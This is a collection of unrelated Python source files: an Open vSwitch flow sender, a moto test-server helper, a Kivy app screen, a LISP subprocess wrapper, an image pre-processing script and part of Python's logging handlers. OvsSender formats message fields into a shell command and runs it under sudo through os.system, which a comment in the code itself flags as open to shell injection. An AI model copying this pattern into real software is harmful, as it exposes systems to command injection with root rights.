        # Unblock handle_request() by sending ourselves a no-op None message.
        addr = "http://{0}:{1}".format(self.host, self.port)
        self.proxy = xmlrpclib.ServerProxy(addr, allow_none=True)
        self.proxy.client_send(pickle.dumps(None))
class OvsSender(MessageSender):
    "A message sender using ovs-ofctl to communicate with switches"
    # NOTE(review): the flow-mod is assembled into a shell string and executed
    # via os.system with sudo; message fields that originate from untrusted
    # input could inject shell commands. Consider subprocess with an argument
    # list instead.
    command = "/usr/bin/sudo /usr/bin/ovs-ofctl"
    # Map OpenFlow flow-mod commands to their ovs-ofctl subcommands.
    subcmds = { OFPFC_ADD : "add-flow",
                OFPFC_DELETE : "del-flows",
                OFPFC_DELETE_STRICT : "--strict del-flows"
              }
    def __init__(self):
        pass
    def send(self, msg):
        """Send the specified OpenFlow message
        msg: the message to send
        Returns the os.system exit status, or None for barrier messages."""
        # don't need to handle barrier messages
        if not hasattr(msg, 'command'):
            return
        pc = debussy.profiling.PerfCounter("ovs_send")
        pc.start()
        subcmd = OvsSender.subcmds[msg.command]
        # TODO: this is different for remote switches (ie, on physical network)
        dest = msg.switch.name
        params = []
        # Build the ovs-ofctl match expression from whichever fields are set.
        if msg.match.nw_src is not None:
            params.append("nw_src={0}".format(msg.match.nw_src))
        if msg.match.nw_dst is not None:
            params.append("nw_dst={0}".format(msg.match.nw_dst))
        if msg.match.dl_src is not None:
            params.append("dl_src={0}".format(msg.match.dl_src))
        if msg.match.dl_dst is not None:
            params.append("dl_dst={0}".format(msg.match.dl_dst))
        if msg.match.dl_type is not None:
            params.append("dl_type={0}".format(msg.match.dl_type))
        params.append("priority={0}".format(msg.priority))
        # OFPP_FLOOD becomes the symbolic "flood" action; others are port numbers.
        actions = ["flood" if a == OFPP_FLOOD else str(a) for a in msg.actions]
        if msg.command == OFPFC_ADD:
            params.append("action=output:" + ",".join(actions))
        paramstr = ",".join(params)
        cmd = "{0} {1} {2} {3}".format(OvsSender.command,
                                       subcmd,
                                       dest,
                                       paramstr)
        ret = os.system(cmd)
        pc.stop()
        return ret
|
moto_server.py | """moto server for pytesting aws services."""
# pylint: disable=too-many-instance-attributes
# pylint: disable=unused-variable
import asyncio
import functools
import logging
import os
import socket
import threading
import time
# Third Party
import aiohttp
import moto.server
import werkzeug.serving
HOST = '127.0.0.1'
_PYCHARM_HOSTED = os.environ.get('PYCHARM_HOSTED') == '1'
# Give PyCharm-hosted runs (debugger overhead) a much longer connect timeout.
_CONNECT_TIMEOUT = 90 if _PYCHARM_HOSTED else 10


def get_free_tcp_port(release_socket: bool = False):
    """Bind an ephemeral TCP port on HOST and report it.

    Args:
        release_socket (bool, optional): close the socket before returning.
            Defaults to False.

    Returns:
        int: the port number, when release_socket is True.
        tuple: (socket, port) when release_socket is False — the caller keeps
        the bound socket open so the port stays reserved until it is closed.

    Note:
        BUG FIX (docs): the original annotated/documented the return as always
        being a tuple, but a bare int is returned when release_socket is True.
    """
    sckt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sckt.bind((HOST, 0))
    _, port = sckt.getsockname()
    if release_socket:
        sckt.close()
        return port
    return sckt, port
class MotoService:
    """Will Create MotoService.
    Service is ref-counted so there will only be one per process. Real
    Service will be returned by `__aenter__`.
    """
    _services = {}  # {name: instance} — class-level registry for ref-counting
    _main_app: moto.server.DomainDispatcherApplication = None
    def __init__(self, service_name: str, port: int = None):
        self._service_name = service_name
        if port:
            # Caller supplied a port; nothing to reserve.
            self._socket = None
            self._port = port
        else:
            # Reserve a free port by holding the bound socket open until the
            # server thread is about to use it (see _server_entry).
            self._socket, self._port = get_free_tcp_port()
        self._thread = None
        self._logger = logging.getLogger('MotoService')
        self._refcount = None
        self._ip_address = HOST
        self._server = None
    @property
    def endpoint_url(self) -> str:
        """Get the server endpoint url.
        Returns:
            str: url
        """
        return f'http://{self._ip_address}:{self._port}'
    def __call__(self, func):
        # Decorator form: start the service around a single awaited call and
        # always stop it afterwards.
        async def wrapper(*args, **kwargs):
            await self._start()
            try:
                result = await func(*args, **kwargs)
            finally:
                await self._stop()
            return result
        functools.update_wrapper(wrapper, func)
        wrapper.__wrapped__ = func
        return wrapper
    async def __aenter__(self):
        # Reuse an already-running instance for the same service name, if any;
        # otherwise register and start this one.
        svc = self._services.get(self._service_name)
        if svc is None:
            self._services[self._service_name] = self
            self._refcount = 1
            await self._start()
            svc = self
        else:
            svc._refcount += 1
        return svc
    async def __aexit__(self, exc_type, exc_val, exc_tb):
        self._refcount -= 1
        if self._socket:
            # Release the reserved port if the server thread never consumed it.
            self._socket.close()
            self._socket = None
        if self._refcount == 0:
            # Last user: unregister and shut the server down.
            del self._services[self._service_name]
            await self._stop()
    def _server_entry(self):
        # Runs on the daemon thread: build the moto WSGI app and serve forever.
        self._main_app = moto.server.DomainDispatcherApplication(
            moto.server.create_backend_app, service=self._service_name)
        self._main_app.debug = True
        if self._socket:
            self._socket.close()  # release right before we use it
            self._socket = None
        self._server = werkzeug.serving.make_server(
            self._ip_address, self._port, self._main_app, True)
        self._server.serve_forever()
    async def _start(self):
        # Spawn the server thread, then poll it over HTTP for up to ~10 s.
        self._thread = threading.Thread(target=self._server_entry, daemon=True)
        self._thread.start()
        async with aiohttp.ClientSession() as session:
            start = time.time()
            while time.time() - start < 10:
                if not self._thread.is_alive():
                    # Server thread died; fall through to the failure branch.
                    break
                try:
                    # we need to bypass the proxies due to monkeypatches
                    async with session.get(f'{self.endpoint_url}/static', timeout=_CONNECT_TIMEOUT):
                        pass
                    break
                except (asyncio.TimeoutError, aiohttp.ClientConnectionError):
                    await asyncio.sleep(0.5)
            else:
                # while-else: loop timed out without a successful connect.
                await self._stop()  # pytest.fail doesn't call stop_process
                raise Exception(f"Cannot start service: {self._service_name}")
    async def _stop(self):
        if self._server:
            self._server.shutdown()
        self._thread.join()
|
seasonscreen.py | import cfg
from kivy.uix.screenmanager import Screen
from kivy.lang import Builder
from kivy.properties import *
from kivy.metrics import dp
import ytvApi as ytv
from threading import Thread
Builder.load_string('''
<SeasonScreen>:
name:'season_screen'
MDBoxLayout:
orientation:'vertical'
RecycleView:
id: season_rv
size_hint_y:None
key_viewclass: 'viewclass'
key_size: 'height'
bar_width:dp(8)
bar_inactive_color:.7,.7,.7,.4
RecycleBoxLayout:
id: season_rb
default_size: None, dp(50)
default_size_hint: None, None
size_hint_x: None
width: self.minimum_width
orientation: 'horizontal'
spacing:dp(2)
RecycleView:
id: others_rv
size_hint_y:
key_viewclass: 'viewclass'
key_size: 'height'
RecycleBoxLayout:
id: others_rb
default_size: None, None
default_size_hint: 1, None
size_hint_y: None
height: self.minimum_height
orientation: 'vertical'
spacing:dp(2)
''')
class SeasonScreen(Screen):
    """Screen with a horizontal row of season buttons and the selected
    season's episode list below."""

    seasons = ObjectProperty([])   # season anchor tags scraped from the site
    episodes = ObjectProperty({})  # cache: season number -> prepared RV data
    count = 0                      # request counter; stale loads are dropped

    def kill(self, *a):
        """Reset screen state when leaving the screen."""
        self.episodes = {}
        self.seasons = ''
        self.ids.season_rv.scroll_x = 0

    def on_seasons(self, *a):
        """Rebuild the season button row whenever `seasons` changes."""
        cfg.SM2 = self.manager
        self.ids.others_rv.data = [{'viewclass': 'YLabel', 'text': f'Select a Season Above to View its Episodes', 'halign': 'center', 'markup': True}]
        if self.seasons:
            data = []
            for no, i in enumerate(self.seasons, 0):
                data.append({'viewclass': 'PageButton', 'text': f'{i.text}', 'group': 'season', 'size_hint': [None, 1], 'width': dp(100), 'season_number': no, 'switch_page': self.switch_page, 'season_check': no})
            self.ids.season_rv.data = data
        elif self.seasons != '':
            # Falsy but not the kill() sentinel '': the scrape failed.
            self.ids.season_rv.data = [{'viewclass': 'YLabel', 'text': f'Loading failed', 'size_hint_x': None}]

    def switch_page(self, no, text):
        """Show season *no* (labelled *text*), fetching its episode list on a
        daemon thread unless it is already cached."""
        self.ids.others_rv.scroll_y = 1
        self.count += 1
        url = self.seasons[no].attrs['href']

        def get_episodes(self, urlz, no, count, text):
            self.ids.others_rv.data = [{'viewclass': 'YLabel', 'text': f'Loading {text}...', 'halign': 'center', 'markup': True}]
            if e := self.episodes.get(no):
                self.ids.others_rv.data = e
                return
            e = ytv.get_episodes(urlz)
            if e and False not in e:
                data = []
                for atag in e:
                    data.append({'viewclass': 'EpisodeButton', 'season_no': no, 'stext': text, 'atag': atag, 'ripple_scale': 0.0})
                self.episodes[no] = data
                # Only publish if no newer request superseded this one.
                if count == self.count:
                    self.ids.others_rv.data = data
            else:
                # BUG FIX: the retry callback called switch_page(no) without the
                # required `text` argument, raising TypeError when tapped.
                self.ids.others_rv.data = [{'viewclass': 'YLabel', 'text': f'Failed to Load {text}[u][i][b] \n[ref=retry]Try Again?[/ref] [/u][/i][/b] ', 'halign': 'center', 'markup': True, 'on_ref_press': lambda *a: self.switch_page(no, text)}]

        Thread(target=get_episodes, args=(self, url, no, self.count, text,), daemon=True).start()
|
spatialreasoner.py | import os
import logging
import queue
import subprocess
import threading
from . import ccl as cclmod
# Term names: the shape objects the spatial reasoner accepts in premises.
TERMS = [
    'square',
    'triangle',
    'circle',
    'line',
    'cross',
    'ell',
    'vee',
    'star',
    'ess',
]
class SpatialReasoner():
def __init__(self, ccl):
self.logger = logging.getLogger(__name__)
self.ccl = ccl
self.exec_path = ccl.exec_path()
# Initialize spatialreasoner
self.initialize_spatialreasoner()
def initialize_spatialreasoner(self):
# Instantiate the result queue
self.resp_queue = queue.Queue()
# Start the LISP process
self.proc = subprocess.Popen(
[self.exec_path],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
# Register the readers
def stdout_reader(proc):
# Setup thread logger
logger = logging.getLogger(__name__ + '-reader')
logger.debug('Starting reader...')
queue_buffer = []
while True:
# Read text
text = proc.stdout.readline().decode('ascii').strip()
logger.debug('spatialreasoner:%s', text)
if 'TERMINATE' in text:
logger.debug('termination handling initiated...')
break
if text == '> Type :? for other options.':
logger.debug('error encountered. popping...')
self.resp_queue.put('ERROR')
break
if text == 'PREMISE FOLLOWS VALIDLY FROM PREVIOUS PREMISES.':
logger.debug('validity detected.')
queue_buffer.append('true')
if text == 'PREMISE IS INCONSISTENT WITH PREVIOUS PREMISES.':
logger.debug('invalidity detected.')
queue_buffer.append('false')
if text == 'PREMISE WAS PREVIOUSLY POSSIBLY TRUE.':
logger.debug('indeterminate true detected.')
queue_buffer.append('indeterminate-true')
if text == 'PREMISE WAS PREVIOUSLY POSSIBLY FALSE.':
logger.debug('indeterminate false detected.')
queue_buffer.append('indeterminate-false')
if text == '"SYNC"':
logger.debug("SYNC detected with queue buffer:%s", queue_buffer)
if queue_buffer:
self.resp_queue.put(queue_buffer)
queue_buffer = []
self.readerstdout = threading.Thread(target=stdout_reader, args=(self.proc,), daemon=True)
self.readerstdout.start()
# Create the FASL file if not existent
lisp_dir = os.path.abspath(os.path.split(os.path.abspath(__file__))[0] + '/lisp')
lisp_path = os.path.abspath(lisp_dir + '/spatial.lisp')
fasl_path = os.path.abspath(lisp_dir + '/spatial.{}'.format(cclmod.FSL_ENDINGS[self.ccl.system]))
fasl_path = fasl_path.replace('\\', '\\\\')
if not os.path.isfile(fasl_path):
self.logger.debug('compiling the lisp code...')
spatial_reasoner_file = lisp_path.replace('\\', '\\\\')
self._send('(compile-file "{}")'.format(spatial_reasoner_file))
# Load spatialreasoner
logging.debug('loading spatialreasoner fasl...')
self._send('(load "{}")'.format(fasl_path))
def _send(self, cmd, send_sync=False):
    """ Send a command to the Clozure Common LISP subprocess.

    Parameters
    ----------
    cmd : str
        Command to send. Surrounding whitespace is stripped before the
        command is written to the interpreter's stdin.
    send_sync : bool, optional
        If True, additionally send ``(prin1 "SYNC")`` after the command.
        The stdout reader thread watches for the echoed ``"SYNC"`` token
        and flushes its buffered results to the response queue.
    """
    # Normalize the command
    cmd = cmd.strip()
    self.logger.debug('Send:%s', cmd)
    # The LISP subprocess reads line-oriented ASCII from its stdin, so
    # terminate the command with a newline and flush immediately.
    self.proc.stdin.write('{}\n'.format(cmd).encode('ascii'))
    self.proc.stdin.flush()
    if send_sync:
        self.logger.debug('Send:SYNC')
        self.proc.stdin.write('{}\n'.format('(prin1 "SYNC")').encode('ascii'))
        self.proc.stdin.flush()
def terminate(self):
    """ Terminate mReasoner and its parent instance of Clozure Common LISP.
    """
    # Shutdown the threads
    # Printing "TERMINATE" makes the stdout reader thread see the token in
    # the subprocess output and break out of its read loop, so the join()
    # below can return.
    self._send('(prin1 "TERMINATE")')
    self.logger.debug('Waiting for stdout...')
    self.readerstdout.join()
    # Terminate Clozure
    # Only quit the LISP process once the reader thread is gone; quitting
    # earlier would close the pipe the reader is still blocked on.
    self._send('(quit)')
def query(self, problem):
    """Run a spatial reasoning problem through the LISP interpreter.

    Each element of *problem* is wrapped in parentheses, the whole set is
    passed to the interpreter's ``interpret`` function, and the buffered
    verdicts collected by the stdout reader thread are returned. On an
    interpreter error the subprocess is restarted and ``['false']`` is
    returned as a safe fallback.
    """
    self.logger.debug('Querying for problem "%s"', problem)
    # Assemble the LISP command from the individual premises.
    wrapped = ('({})'.format(premise) for premise in problem)
    command = "(interpret '({}))".format(''.join(wrapped))
    self.logger.debug('cmd: "%s"', command)
    # Send the command and request a SYNC marker so the reader flushes.
    self._send(command, send_sync=True)
    # Block until the stdout reader thread publishes a result.
    response = self.resp_queue.get()
    if response != 'ERROR':
        return response
    # The reader reported a broken interpreter; restart it and fail safe.
    self.logger.info('Error detected. Restarting...')
    self.proc.terminate()
    self.initialize_spatialreasoner()
    return ['false']
|
dataPreProcessing.py | # -*- coding: utf-8 -*-
"""
Created on Wed Jan 13 19:02:19 2021
@author: Jacob Salminen
@version: 1.0
"""
#%% IMPORTS
import os
import sys
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.dirname(SCRIPT_DIR))
import multiprocessing as mp
from datetime import date
from localPkg.preproc import ProcessPipe
from os.path import dirname, join, abspath, exists
#%% Globals
dTime = date.today().strftime('%d%m%Y')
#%% Initialize Image Parsing/Pre-Processing
# change the 'start' in PARAMS to choose which file you want to start with.
#%% DEFINITIONS
def mainInput(im_list,q):
    # Run the full pre-processing pipeline over im_list and push the result
    # onto the multiprocessing queue q (intended as an mp.Process target).
    # NOTE(review): rawDatDir, trainDatDir and savePath are module-level
    # names that are only bound inside the __main__ guard below, so this
    # function only works when the script is run directly — confirm before
    # importing and calling it from another module.
    # for i in im_list:
    q.put(ProcessPipe.mainLoop(im_list,rawDatDir,trainDatDir,savePath))
    #endfor
#enddef
#%% LOOP: Image Parsing/Pre-Processing
if __name__ == '__main__':
    #%% PATHS
    # Path to file
    cfpath = dirname(__file__)
    # Sibling pipeline stages live next to this script's parent directory.
    aDatGenDir = abspath(join(cfpath,"..","a_dataGeneration"))
    bDatAggDir = abspath(join(cfpath,"..","b_dataAggregation"))
    # Path to images to be processed
    rawDatDir = join(aDatGenDir,"rawData")
    # Path to training files
    trainDatDir = join(bDatAggDir,"processedData","EL-11122021")
    # Path to aggregate data files
    aggDatDir = join(bDatAggDir,"aggregateData")
    # Output directory is stamped with today's date (dTime, '%d%m%Y').
    savePath = join(aggDatDir,dTime)
    # Hand-picked image indices to process.
    im_list = [3,4,5,6,10,12,13,14,21,26,27,28,29,35] #[i for i in range(start,im_dir.dir_len)]
    print("Number of processors: ", mp.cpu_count())
    #%% Loop Start - Basic Loop
    print('Starting PreProcessing Pipeline...')
    # Sequential reference implementation, kept for debugging:
    # for i in im_list:
    #     result = ProcessPipe.mainLoop(i,rawDatDir,trainDatDir,savePath)
    #     break
    # #endfor
    #%% Loop Start - multiprocessing documentation ex
    #! see. https://docs.python.org/3/library/multiprocessing.html !#
    # ***(03/27/2022): make an implementation in mpProcessPipe and mpDataManager.
    # mp.set_start_method('spawn')
    # q = mp.Queue()
    # p = mp.Process(target = mainInput, args = (im_list,q))
    # p.start()
    # p.join()
    #%% Loop Start - parallel processing
    # import concurrent.futures
    # with concurrent.futures.ProcessPoolExecutor() as executor:
    #     executor.map(mainLoop, im_list)
    #endwith
    #%% Loop Start - async-multi processing num. 1
    # Active implementation: joblib fans mainLoop out over one job per core.
    from joblib import Parallel, delayed
    threadN = mp.cpu_count()
    results = Parallel(n_jobs=threadN)(delayed(ProcessPipe.mainLoop)(i,rawDatDir,trainDatDir,savePath) for i in im_list) # only one that works? (03/04/2022)
    #%% Loop Start - async-multi processing num. 2
    # pool = mp.Pool(mp.cpu_count())
    # #! extract valid data into a neater structure !#
    # tmpDat = results[0]
    # X = []
    # y = []
    # for i in range(0,len(tmpDat)):
    #     X.append(tmpDat[i][0])
    #     y.append(tmpDat[i][1])
    # #endfor
    # print('done')
    # # Save Data
    # tmpDat = (X,y)
    # tmpSaveDir = join(aggDatDir, ('joined_data_'+dTime+'.pkl'))
    # DataManager.save_obj(tmpSaveDir,tmpDat)
#endif
handlers.py | # Copyright 2001-2016 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
Additional handlers for the logging package for Python. The core package is
based on PEP 282 and comments thereto in comp.lang.python.
Copyright (C) 2001-2016 Vinay Sajip. All Rights Reserved.
To use, simply 'import logging.handlers' and log away!
"""
import io, logging, socket, os, pickle, struct, time, re
from stat import ST_DEV, ST_INO, ST_MTIME
import queue
import threading
import copy
#
# Some constants...
#
# Default ports used by the network handlers below; 514 is the standard
# syslog port.
DEFAULT_TCP_LOGGING_PORT = 9020
DEFAULT_UDP_LOGGING_PORT = 9021
DEFAULT_HTTP_LOGGING_PORT = 9022
DEFAULT_SOAP_LOGGING_PORT = 9023
SYSLOG_UDP_PORT = 514
SYSLOG_TCP_PORT = 514

_MIDNIGHT = 24 * 60 * 60  # number of seconds in a day
class BaseRotatingHandler(logging.FileHandler):
    """
    Base class for handlers that rotate log files at a certain point.
    Not meant to be instantiated directly. Instead, use RotatingFileHandler
    or TimedRotatingFileHandler.

    Subclasses must implement shouldRollover(record) and doRollover();
    emit() below is the template method that ties them together.
    """
    # Optional user-supplied callables customizing rotation; consulted by
    # rotation_filename() and rotate() respectively.
    namer = None
    rotator = None

    def __init__(self, filename, mode, encoding=None, delay=False, errors=None):
        """
        Use the specified filename for streamed logging
        """
        logging.FileHandler.__init__(self, filename, mode=mode,
                                     encoding=encoding, delay=delay,
                                     errors=errors)
        self.mode = mode
        self.encoding = encoding
        self.errors = errors

    def emit(self, record):
        """
        Emit a record.

        Output the record to the file, catering for rollover as described
        in doRollover().
        """
        try:
            if self.shouldRollover(record):
                self.doRollover()
            logging.FileHandler.emit(self, record)
        except Exception:
            self.handleError(record)

    def rotation_filename(self, default_name):
        """
        Modify the filename of a log file when rotating.

        This is provided so that a custom filename can be provided.

        The default implementation calls the 'namer' attribute of the
        handler, if it's callable, passing the default name to
        it. If the attribute isn't callable (the default is None), the name
        is returned unchanged.

        :param default_name: The default name for the log file.
        """
        if not callable(self.namer):
            result = default_name
        else:
            result = self.namer(default_name)
        return result

    def rotate(self, source, dest):
        """
        When rotating, rotate the current log.

        The default implementation calls the 'rotator' attribute of the
        handler, if it's callable, passing the source and dest arguments to
        it. If the attribute isn't callable (the default is None), the source
        is simply renamed to the destination.

        :param source: The source filename. This is normally the base
                       filename, e.g. 'test.log'
        :param dest:   The destination filename. This is normally
                       what the source is rotated to, e.g. 'test.log.1'.
        """
        if not callable(self.rotator):
            # Issue 18940: A file may not have been created if delay is True.
            if os.path.exists(source):
                os.rename(source, dest)
        else:
            self.rotator(source, dest)
class RotatingFileHandler(BaseRotatingHandler):
    """
    Handler for logging to a set of files, which switches from one file
    to the next when the current file reaches a certain size.
    """
    def __init__(self, filename, mode='a', maxBytes=0, backupCount=0,
                 encoding=None, delay=False, errors=None):
        """
        Open the specified file and use it as the stream for logging.

        By default, the file grows indefinitely. You can specify particular
        values of maxBytes and backupCount to allow the file to rollover at
        a predetermined size.

        Rollover occurs whenever the current log file is nearly maxBytes in
        length. If backupCount is >= 1, the system will successively create
        new files with the same pathname as the base file, but with extensions
        ".1", ".2" etc. appended to it. For example, with a backupCount of 5
        and a base file name of "app.log", you would get "app.log",
        "app.log.1", "app.log.2", ... through to "app.log.5". The file being
        written to is always "app.log" - when it gets filled up, it is closed
        and renamed to "app.log.1", and if files "app.log.1", "app.log.2" etc.
        exist, then they are renamed to "app.log.2", "app.log.3" etc.
        respectively.

        If maxBytes is zero, rollover never occurs.
        """
        # If rotation/rollover is wanted, it doesn't make sense to use another
        # mode. If for example 'w' were specified, then if there were multiple
        # runs of the calling application, the logs from previous runs would be
        # lost if the 'w' is respected, because the log file would be truncated
        # on each run.
        if maxBytes > 0:
            mode = 'a'
        if "b" not in mode:
            encoding = io.text_encoding(encoding)
        BaseRotatingHandler.__init__(self, filename, mode, encoding=encoding,
                                     delay=delay, errors=errors)
        self.maxBytes = maxBytes
        self.backupCount = backupCount

    def doRollover(self):
        """
        Do a rollover, as described in __init__().
        """
        if self.stream:
            self.stream.close()
            self.stream = None
        if self.backupCount > 0:
            # Shift app.log.1 -> app.log.2, ..., dropping the oldest backup.
            for i in range(self.backupCount - 1, 0, -1):
                sfn = self.rotation_filename("%s.%d" % (self.baseFilename, i))
                dfn = self.rotation_filename("%s.%d" % (self.baseFilename,
                                                        i + 1))
                if os.path.exists(sfn):
                    if os.path.exists(dfn):
                        os.remove(dfn)
                    os.rename(sfn, dfn)
            dfn = self.rotation_filename(self.baseFilename + ".1")
            if os.path.exists(dfn):
                os.remove(dfn)
            self.rotate(self.baseFilename, dfn)
        if not self.delay:
            self.stream = self._open()

    def shouldRollover(self, record):
        """
        Determine if rollover should occur.

        Basically, see if the supplied record would cause the file to exceed
        the size limit we have.
        """
        if self.stream is None:                 # delay was set...
            self.stream = self._open()
        if self.maxBytes > 0:                   # are we rolling over?
            # gh-102778: never "rotate" a non-regular file (e.g. /dev/null).
            # Such a target never shrinks after rotation, so without this
            # guard every record would trigger a pointless rollover.
            if os.path.exists(self.baseFilename) and \
                    not os.path.isfile(self.baseFilename):
                return False
            msg = "%s\n" % self.format(record)
            self.stream.seek(0, 2)  #due to non-posix-compliant Windows feature
            if self.stream.tell() + len(msg) >= self.maxBytes:
                return True
        return False
class TimedRotatingFileHandler(BaseRotatingHandler):
    """
    Handler for logging to a file, rotating the log file at certain timed
    intervals.

    If backupCount is > 0, when rollover is done, no more than backupCount
    files are kept - the oldest ones are deleted.
    """
    def __init__(self, filename, when='h', interval=1, backupCount=0,
                 encoding=None, delay=False, utc=False, atTime=None,
                 errors=None):
        """
        Initialize the handler.

        *when* selects the rollover unit (see the comment block below).
        *atTime* is a time-of-day object (hour/minute/second attributes)
        pinning 'MIDNIGHT'/'W*' rollovers to a specific time; *utc*
        switches the time calculations from local time to UTC.

        Raises ValueError for an unrecognized *when* specifier.
        """
        encoding = io.text_encoding(encoding)
        BaseRotatingHandler.__init__(self, filename, 'a', encoding=encoding,
                                     delay=delay, errors=errors)
        self.when = when.upper()
        self.backupCount = backupCount
        self.utc = utc
        self.atTime = atTime
        # Calculate the real rollover interval, which is just the number of
        # seconds between rollovers.  Also set the filename suffix used when
        # a rollover occurs.  Current 'when' events supported:
        # S - Seconds
        # M - Minutes
        # H - Hours
        # D - Days
        # midnight - roll over at midnight
        # W{0-6} - roll over on a certain day; 0 - Monday
        #
        # Case of the 'when' specifier is not important; lower or upper case
        # will work.
        if self.when == 'S':
            self.interval = 1 # one second
            self.suffix = "%Y-%m-%d_%H-%M-%S"
            self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2}(\.\w+)?$"
        elif self.when == 'M':
            self.interval = 60 # one minute
            self.suffix = "%Y-%m-%d_%H-%M"
            self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}(\.\w+)?$"
        elif self.when == 'H':
            self.interval = 60 * 60 # one hour
            self.suffix = "%Y-%m-%d_%H"
            self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}(\.\w+)?$"
        elif self.when == 'D' or self.when == 'MIDNIGHT':
            self.interval = 60 * 60 * 24 # one day
            self.suffix = "%Y-%m-%d"
            self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
        elif self.when.startswith('W'):
            self.interval = 60 * 60 * 24 * 7 # one week
            if len(self.when) != 2:
                raise ValueError("You must specify a day for weekly rollover from 0 to 6 (0 is Monday): %s" % self.when)
            if self.when[1] < '0' or self.when[1] > '6':
                raise ValueError("Invalid day specified for weekly rollover: %s" % self.when)
            self.dayOfWeek = int(self.when[1])
            self.suffix = "%Y-%m-%d"
            self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
        else:
            raise ValueError("Invalid rollover interval specified: %s" % self.when)

        # extMatch recognizes the timestamp suffixes produced above (plus an
        # optional extension) when scanning for old files to delete.
        self.extMatch = re.compile(self.extMatch, re.ASCII)
        self.interval = self.interval * interval # multiply by units requested
        # The following line added because the filename passed in could be a
        # path object (see Issue #27493), but self.baseFilename will be a string
        filename = self.baseFilename
        if os.path.exists(filename):
            # Anchor the first rollover to the existing file's mtime, so a
            # restart does not reset the rotation schedule.
            t = os.stat(filename)[ST_MTIME]
        else:
            t = int(time.time())
        self.rolloverAt = self.computeRollover(t)

    def computeRollover(self, currentTime):
        """
        Work out the rollover time based on the specified time.
        """
        result = currentTime + self.interval
        # If we are rolling over at midnight or weekly, then the interval is already known.
        # What we need to figure out is WHEN the next interval is.  In other words,
        # if you are rolling over at midnight, then your base interval is 1 day,
        # but you want to start that one day clock at midnight, not now.  So, we
        # have to fudge the rolloverAt value in order to trigger the first rollover
        # at the right time.  After that, the regular interval will take care of
        # the rest.  Note that this code doesn't care about leap seconds. :)
        if self.when == 'MIDNIGHT' or self.when.startswith('W'):
            # This could be done with less code, but I wanted it to be clear
            if self.utc:
                t = time.gmtime(currentTime)
            else:
                t = time.localtime(currentTime)
            currentHour = t[3]
            currentMinute = t[4]
            currentSecond = t[5]
            currentDay = t[6]
            # r is the number of seconds left between now and the next rotation
            if self.atTime is None:
                rotate_ts = _MIDNIGHT
            else:
                rotate_ts = ((self.atTime.hour * 60 + self.atTime.minute)*60 +
                    self.atTime.second)

            r = rotate_ts - ((currentHour * 60 + currentMinute) * 60 +
                currentSecond)
            if r < 0:
                # Rotate time is before the current time (for example when
                # self.rotateAt is 13:45 and it now 14:15), rotation is
                # tomorrow.
                r += _MIDNIGHT
                currentDay = (currentDay + 1) % 7
            result = currentTime + r
            # If we are rolling over on a certain day, add in the number of days until
            # the next rollover, but offset by 1 since we just calculated the time
            # until the next day starts.  There are three cases:
            # Case 1) The day to rollover is today; in this case, do nothing
            # Case 2) The day to rollover is further in the interval (i.e., today is
            #         day 2 (Wednesday) and rollover is on day 6 (Sunday).  Days to
            #         next rollover is simply 6 - 2 - 1, or 3.
            # Case 3) The day to rollover is behind us in the interval (i.e., today
            #         is day 5 (Saturday) and rollover is on day 3 (Thursday).
            #         Days to rollover is 6 - 5 + 3, or 4.  In this case, it's the
            #         number of days left in the current week (1) plus the number
            #         of days in the next week until the rollover day (3).
            # The calculations described in 2) and 3) above need to have a day added.
            # This is because the above time calculation takes us to midnight on this
            # day, i.e. the start of the next day.
            if self.when.startswith('W'):
                day = currentDay # 0 is Monday
                if day != self.dayOfWeek:
                    if day < self.dayOfWeek:
                        daysToWait = self.dayOfWeek - day
                    else:
                        daysToWait = 6 - day + self.dayOfWeek + 1
                    newRolloverAt = result + (daysToWait * (60 * 60 * 24))
                    if not self.utc:
                        dstNow = t[-1]
                        dstAtRollover = time.localtime(newRolloverAt)[-1]
                        if dstNow != dstAtRollover:
                            if not dstNow:  # DST kicks in before next rollover, so we need to deduct an hour
                                addend = -3600
                            else:           # DST bows out before next rollover, so we need to add an hour
                                addend = 3600
                            newRolloverAt += addend
                    result = newRolloverAt
        return result

    def shouldRollover(self, record):
        """
        Determine if rollover should occur.

        record is not used, as we are just comparing times, but it is needed so
        the method signatures are the same
        """
        t = int(time.time())
        if t >= self.rolloverAt:
            return 1
        return 0

    def getFilesToDelete(self):
        """
        Determine the files to delete when rolling over.

        More specific than the earlier method, which just used glob.glob().
        """
        dirName, baseName = os.path.split(self.baseFilename)
        fileNames = os.listdir(dirName)
        result = []
        # Candidates are siblings named "<base>.<timestamp suffix>".
        prefix = baseName + "."
        plen = len(prefix)
        for fileName in fileNames:
            if fileName[:plen] == prefix:
                suffix = fileName[plen:]
                if self.extMatch.match(suffix):
                    result.append(os.path.join(dirName, fileName))
        if len(result) < self.backupCount:
            # Fewer backups than the limit: nothing to delete.
            result = []
        else:
            # Timestamp suffixes sort chronologically; keep the newest
            # backupCount files and return the rest for deletion.
            result.sort()
            result = result[:len(result) - self.backupCount]
        return result

    def doRollover(self):
        """
        do a rollover; in this case, a date/time stamp is appended to the filename
        when the rollover happens.  However, you want the file to be named for the
        start of the interval, not the current time.  If there is a backup count,
        then we have to get a list of matching filenames, sort them and remove
